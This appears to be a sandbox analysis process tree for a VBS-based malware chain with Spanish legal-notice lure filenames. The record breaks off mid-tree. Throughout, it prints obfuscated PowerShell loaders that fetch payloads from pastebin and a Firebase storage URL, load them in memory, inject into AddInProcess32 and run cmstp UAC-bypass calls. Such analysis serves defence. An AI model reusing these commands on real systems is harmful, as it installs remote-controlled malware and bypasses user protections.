                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3160
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                    4⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1600
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5644
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"' & exit
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5236
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"'
                                          7⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4524
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"
                                            8⤵
                                            • Checks computer location settings
                                            • System Location Discovery: System Language Discovery
                                            PID:4972
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bu☆GE☆b☆Bl☆G0☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆GU☆awBo☆HU☆a☆☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆aQBy☆GQ☆awB0☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆aQBy☆GQ☆awB0☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GI☆OQ☆1☆DY☆MQ☆3☆GQ☆MgBm☆GE☆Mw☆t☆Dk☆Zg☆0☆GI☆LQ☆w☆DE☆Yg☆0☆C0☆ZQ☆3☆DE☆Yw☆t☆Dc☆MwBk☆Dg☆M☆Bl☆DY☆Zg☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆OQ☆w☆C0☆O☆☆x☆G4☆eQBz☆GE☆LwBv☆C8☆bQBv☆GM☆LgB0☆G8☆c☆Bz☆H☆☆c☆Bh☆C4☆YwBv☆GQ☆LQBl☆HI☆YgBt☆GU☆aQB2☆G8☆bg☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆GU☆awBo☆HU☆a☆☆g☆Cw☆I☆☆n☆H☆☆dgBk☆GE☆cw☆n☆Cw☆I☆☆k☆G4☆YQBs☆GU☆bQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs');powershell $KByHL;
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5488
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nalem = '0';$ekhuh = 'C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $irdkt = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($irdkt).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0b95617d2fa3-9f4b-01b4-e71c-73d80e6f=nekot&aidem=tla?txt.4202-90-81nysa/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $ekhuh , 'pvdas', $nalem, '1', 'Roda' ));"
                                                10⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6024
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                  11⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3784
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    PID:4248
                                                  • C:\Windows\SysWOW64\cmstp.exe
                                                    "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\kfgsxdbc.inf
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5852
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4680
                                                  • C:\Windows\SysWOW64\cmstp.exe
                                                    "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\4ias0hcg.inf
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5520
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3580
                                                  • C:\Windows\SysWOW64\cmstp.exe
                                                    "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\kipuvain.inf
                                                    12⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1032
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"' & exit
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5276
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"'
                                          7⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5220
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"
                                            8⤵
                                            • Checks computer location settings
                                            • System Location Discovery: System Language Discovery
                                            PID:5060
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bm☆HE☆dgBk☆HI☆I☆☆9☆C☆☆Jw☆w☆DM☆Jw☆7☆CQ☆d☆Bp☆G8☆dQBw☆C☆☆PQ☆g☆Cc☆JQBw☆Ho☆QQBj☆E8☆ZwBJ☆G4☆TQBy☆CU☆Jw☆7☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBy☆HY☆aQBj☆GU☆U☆Bv☆Gk☆bgB0☆E0☆YQBu☆GE☆ZwBl☆HI☆XQ☆6☆Do☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆☆g☆D0☆I☆Bb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆FQ☆eQBw☆GU☆XQ☆6☆Do☆V☆Bs☆HM☆MQ☆y☆Ds☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆9☆C☆☆JwBo☆HQ☆d☆Bw☆HM☆Og☆v☆C8☆c☆Bh☆HM☆d☆Bl☆GI☆aQBu☆C4☆YwBv☆G0☆LwBy☆GE☆dw☆v☆EE☆Z☆B2☆Dk☆ZwBC☆Eg☆YQ☆n☆Ds☆J☆BJ☆Eg☆c☆BM☆HE☆I☆☆9☆C☆☆K☆BO☆GU☆dw☆t☆E8☆YgBq☆GU☆YwB0☆C☆☆TgBl☆HQ☆LgBX☆GU☆YgBD☆Gw☆aQBl☆G4☆d☆☆p☆C4☆R☆Bv☆Hc☆bgBs☆G8☆YQBk☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆k☆F☆☆e☆BF☆Ew☆W☆☆g☆C☆☆KQ☆7☆CQ☆UgBD☆Gs☆VgBK☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BJ☆Eg☆c☆BM☆HE☆I☆☆p☆C4☆cgBl☆H☆☆b☆Bh☆GM☆ZQ☆o☆Cc☆J☆☆l☆Cc☆L☆☆n☆EE☆Jw☆p☆Ds☆WwBC☆Hk☆d☆Bl☆Fs☆XQBd☆C☆☆J☆Bl☆G4☆YgB4☆Go☆I☆☆9☆C☆☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EM☆bwBu☆HY☆ZQBy☆HQ☆XQ☆6☆Do☆RgBy☆G8☆bQBC☆GE☆cwBl☆DY☆N☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BS☆EM☆awBW☆Eo☆I☆☆p☆Ds☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EE☆c☆Bw☆EQ☆bwBt☆GE☆aQBu☆F0☆Og☆6☆EM☆dQBy☆HI☆ZQBu☆HQ☆R☆Bv☆G0☆YQBp☆G4☆LgBM☆G8☆YQBk☆Cg☆J☆Bl☆G4☆YgB4☆Go☆KQ☆u☆Ec☆ZQB0☆FQ☆eQBw☆GU☆K☆☆n☆FQ☆ZQBo☆HU☆b☆Bj☆Gg☆ZQBz☆Fg☆e☆BY☆Hg☆e☆☆u☆EM☆b☆Bh☆HM☆cw☆x☆Cc☆KQ☆u☆Ec☆ZQB0☆E0☆ZQB0☆Gg☆bwBk☆Cg☆JwBN☆HM☆cQBC☆Ek☆YgBZ☆Cc☆KQ☆u☆Ek☆bgB2☆G8☆awBl☆Cg☆J☆Bu☆HU☆b☆Bs☆Cw☆I☆Bb☆G8☆YgBq☆GU☆YwB0☆Fs☆XQBd☆C☆☆K☆☆n☆GM☆ZQ☆0☆DY☆OQ☆x☆DQ☆Zg☆1☆DI☆Mw☆0☆C0☆N☆☆y☆GY☆O☆☆t☆DQ☆ZQ☆4☆DQ☆LQ☆4☆DE☆ZQ☆z☆C0☆Nw☆4☆GU☆ZQ☆1☆Dg☆Z☆Bl☆D0☆bgBl☆Gs☆bwB0☆CY☆YQBp☆GQ☆ZQBt☆D0☆d☆Bs☆GE☆PwB0☆Hg☆d☆☆u☆G8☆d☆Bz☆G8☆ZwBh☆Gw☆dQB6☆GE☆LwBv☆C8☆bQBv☆GM☆LgB0☆G8☆c☆Bz☆H☆☆c☆Bh☆C4☆bwBj☆Gk☆bgBv☆HI☆d☆Bj☆GU☆b☆Bl☆C0☆bwB0☆G4☆ZQBt☆HU☆YwBv☆GQ☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B0☆Gk☆bwB1☆H☆☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆GI☆agB3☆HE☆b☆Bf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bm☆HE☆dgBk☆HI☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs');powershell $KByHL;
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5624
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$fqvdr = '03';$tioup = 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $enbxj = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($enbxj).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ce46914f5234-42f8-4e84-81e3-78ee58de=nekot&aidem=tla?txt.otsogaluza/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $tioup , '____bjwql________________________________________-------', $fqvdr, '1', 'Roda' ));"
                                                10⤵
                                                • Blocklisted process makes network request
                                                • Drops startup file
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2508
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                                                  11⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3192
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                  11⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5288
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5864 /prefetch:2
                                2⤵
                                  PID:3208
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:2180
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:2840
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:5364
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                      1⤵
                                      • Checks computer location settings
                                      PID:5716
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
